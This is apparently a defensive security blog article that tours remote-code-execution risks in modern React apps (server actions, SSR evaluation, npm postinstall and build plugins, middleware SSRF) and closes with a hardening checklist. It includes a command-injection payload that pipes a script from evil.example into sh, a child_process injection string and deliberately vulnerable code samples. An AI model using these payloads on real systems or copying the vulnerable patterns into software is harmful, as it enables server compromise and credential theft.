Back to articles
vulnerabilities
12 min readApril 28, 2026

RCE in React Apps: It's Not Where You Think

Browsers sandbox your React code, so RCE is impossible — right? Wrong. The remote code execution in modern React apps lives in places most developers never look: server actions, build pipelines, and the npm tree underneath your bundler.

RCE in React Apps: It's Not Where You Think

RCE in React Apps: It's Not Where You Think

Every few months a developer sends me the same message: "I ran a security scan on my React app and it flagged a possible RCE. Is that even a thing?" The honest answer is yes, it's a thing — just not where the scanner is looking. The browser is a sandbox.

document.createElement
will not summon a shell. If your React code runs entirely in a tab on someone else's machine, the worst a typo can do is XSS, and XSS is bad but it isn't remote code execution in the classical sense.

The reason RCE keeps showing up in modern React projects isn't because React itself grew teeth. It's because "a React app" stopped meaning "a static bundle served from a CDN" several years ago. A 2026-vintage React app is a server action endpoint, an SSR runtime, an image optimizer, a middleware function, a build pipeline, and a tree of 1,400 transitive npm dependencies — most of which can execute arbitrary Node.js code somewhere in your stack. That's where the remote code execution lives.

This is a tour of the four places it actually shows up.

The Browser Is Not Where the Bodies Are Buried

Before we go anywhere else, let's settle the easy part. Pure client-side React, executing in a browser tab, does not give an attacker code execution on your server or your user's machine. The browser sandbox is real. JavaScript inside a tab can read what the tab can read, send what the tab can send, and that's the boundary.

What people often confuse for "React RCE" is one of these:

  • dangerouslySetInnerHTML
    accepting unsanitized user input — that's a stored or reflected XSS, not RCE. Worth fixing immediately, but it's a different bug.
  • A markdown renderer that allows raw HTML — same category, same severity bracket.
  • Hydration mismatches where SSR produces different HTML than the client expects — generally a correctness bug, occasionally an XSS escalation, almost never RCE.

If your scanner flagged

dangerouslySetInnerHTML
and called it RCE, your scanner is wrong about the taxonomy. Fix it because it's still XSS. But the actual RCE attack surface in a modern React app sits one layer deeper.

Where It Actually Lives, #1: Server Actions

Server Components and Server Actions changed the architecture. A "React app" now routinely contains functions that look like client code, are imported into client components, and silently execute on the server with full Node.js privileges.

tsx
'use server';

export async function runReport(filter: string) {
  // This runs on the server, with whatever permissions the Node process has.
  const { stdout } = await execAsync(`./bin/report --filter=${filter}`);
  return stdout;
}

The

'use server'
directive at the top of the file means this is a callable RPC endpoint exposed to any client that knows how to invoke it. The shape of the bug is exactly the same as the shape of the bug 25 years ago in CGI scripts: untrusted input concatenated into a shell command. The interpolation is the vulnerability. An attacker doesn't need to do anything fancy — passing
x; curl evil.example/payload.sh | sh
as the filter value works on the same principle that worked against
os.system
in 2003.

The server action wrapper makes this worse, not better, in two ways.

First, the boundary is invisible. To a developer reading the file,

runReport
looks like every other function in the codebase. Treating untrusted input as trusted is much easier to do when there's no syntactic signal that the input is untrusted.

Second, server actions accept arbitrary serialized payloads from the client. The framework deserializes the arguments and calls your function. If your function signature says

filter: string
, the framework will hand you a string — but it won't do anything to validate the contents of that string. Type safety at the function boundary is not input sanitization at the security boundary.

The fix is unglamorous: never pass user input to

exec
,
execSync
,
spawn
with
shell: true
, or any equivalent. Use
spawn
with an argument array (
spawn('./bin/report', ['--filter', filter])
), and validate the input against a strict allowlist before it gets anywhere near a subprocess.

Where It Actually Lives, #2: The SSR Render Path

Server-side rendering means React is producing HTML in a Node process. Anything that touches that render path with user input is a potential entry point.

The classic example is a custom template helper that accepts user-controlled HTML and feeds it into something that resembles

eval
more than it should:

tsx
function renderUserBio(bio: string) {
  // Looks innocent. Is not.
  return new Function('return `' + bio + '`')();
}

The author probably wanted template-literal interpolation. What they got was

new Function
constructing a function from a string that contains user input. A bio of
${process.mainModule.require('child_process').execSync('id')}
returns the contents of
/etc/passwd
-adjacent data on the next render. This is RCE in the textbook sense.

This pattern is rare in idiomatic React, but it appears all the time in custom theming systems, "user-defined" widgets, and templating layers built on top of React. Anywhere a developer reaches for

Function
,
eval
,
vm.runInNewContext
, or a third-party expression evaluator, ask: does any user input reach this? If yes, the answer is to redesign — there is no safe way to evaluate untrusted JavaScript in the same process as your server.

A subtler variant is server-side template injection through markdown or MDX. MDX in particular lets authors embed JSX, which means an MDX file authored by an untrusted user is, by design, executable React code. If your CMS lets users upload MDX, your CMS lets users execute code on your render server. The fix is either strict MDX (a profile that disables JS evaluation) or accepting only plain markdown.

Where It Actually Lives, #3: The Build Pipeline

This is the category most people miss because it doesn't feel like part of the app.

When you run

npm install
, every package in your dependency tree has the opportunity to execute its
postinstall
script. That script runs with the privileges of whatever account ran
npm install
— usually a developer's laptop, your CI runner, or your deploy target. There is no sandbox. The script can do anything the user can do.

In 2024, an academic study counted around 1,400 transitive dependencies in a freshly scaffolded Next.js project. Each of those packages could, in principle, ship malicious code in a future minor version, and your lockfile only protects you until you bump. This isn't theoretical:

event-stream
,
ua-parser-js
,
coa
,
rc
, and a steady drumbeat of typosquatted packages have all delivered malware through exactly this channel.

Build-time RCE doesn't even need a postinstall script. Webpack and Vite plugins execute Node code during the build itself. A malicious or compromised plugin can read environment variables (CI secrets, deploy tokens, AWS credentials), inject backdoor code into the production bundle, or stage a payload that fires only when the build runs in a CI environment matching certain heuristics.

The defenses here are all unsexy:

  • npm install --ignore-scripts
    plus selective allowlisting of packages that genuinely need install scripts.
  • Lockfile-pinned, integrity-hashed dependencies — never
    ^1.0.0
    for security-critical packages.
  • A separate, isolated build environment with no production credentials present at build time.
  • Tooling like Socket, Snyk, or npm audit running on every PR — not as a gate, but as a signal you read.

The pattern to internalize: your build pipeline is a privileged environment that runs untrusted code on every install. Treat it accordingly.

Where It Actually Lives, #4: Middleware and Edge Functions

React frameworks lean heavily on middleware — small functions that run on every request, often at the edge, often with access to environment variables and outbound network. They're a beautiful target.

The bugs cluster in two places.

Header injection into outbound requests. Middleware that forwards an inbound header to an outbound API call without validation is a Server-Side Request Forgery vulnerability waiting to happen. SSRF isn't always RCE, but in cloud environments it often is — the attacker uses the SSRF to read instance metadata, exfiltrate IAM credentials, and pivot from there.

tsx
export async function middleware(req: NextRequest) {
  const target = req.headers.get('x-internal-target');
  // Attacker controls 'target'. Now we make a server-side request to wherever they say.
  return fetch(`https://api.internal/${target}`);
}

Pattern compilation from user input. Some middleware compiles regexes or path patterns from request data.

new RegExp(userInput)
is not RCE on its own (it's a ReDoS vector), but
pathToRegexp
and similar libraries have shipped CVEs where pattern compilation could be coerced into executing code under specific configurations. The general principle: if a library compiles user input into something that gets executed, audit that library carefully and pin its version.

Edge runtimes (Cloudflare Workers, Vercel Edge, Deno Deploy) reduce the blast radius — they're sandboxed and don't have full Node APIs. But they do have outbound network and they do have access to bound secrets, so SSRF and credential leakage remain in scope even when classical RCE doesn't.

A Defensive Checklist That Actually Helps

Most security checklists for React apps spend their first ten items on

dangerouslySetInnerHTML
and end before they reach the actual attack surface. Reverse the order.

  1. Audit every
    'use server'
    file and every API route handler. Trace user input from entry point to every
    exec
    ,
    spawn
    , file-system, or database call. Concatenation into shell strings is RCE; argument arrays are not.
  2. Grep your codebase for
    new Function
    ,
    eval
    ,
    vm.runIn
    , and any expression evaluator library. Each occurrence needs an explicit answer to "can user input reach this?"
  3. If you accept user-authored content that is rendered server-side, ban MDX and JSX-in-content. Plain markdown only, with an HTML sanitizer on the output.
  4. Run builds with
    --ignore-scripts
    by default. Keep an explicit allowlist of packages that need postinstall scripts and review additions to that list.
  5. Builds should not have production credentials. CI deploy steps should — and those steps should run after the build artifact is hashed and signed.
  6. Middleware that forwards request data to outbound calls is high-risk. Validate the destination, validate the headers, prefer allowlists over denylists.
  7. Pin and integrity-check security-critical dependencies. Subscribe to advisories for the frameworks you use (Next.js, Remix, React Router, your bundler).
  8. Yes, also fix
    dangerouslySetInnerHTML
    and prevent XSS. It's just not the headline.

The Honest Summary

The phrase "RCE in React" is technically a category error. React doesn't execute remote code; the runtime around React executes code, and modern React apps come with a lot of runtime. The browser tab is not where the threat lives. The threat lives in the server action you forgot was an RPC endpoint, the SSR helper that reaches for

new Function
, the postinstall script in a transitive dependency you never audited, and the middleware function that trusts an inbound header. Each of these is fixable. Each of these is missed by every security tool that treats "React" as synonymous with "browser."

The best mental model is to stop thinking of a React project as a frontend and start thinking of it as a distributed system whose frontend happens to be React. Once you've made that shift, the question is no longer "can my React app have RCE" — it's "where does my React app run untrusted-influenced code, and what's protecting each of those execution boundaries?" That question has answers. The first one didn't.

Discussion

0 comments

Share your thoughts

No comments yet. Be the first to share your thoughts!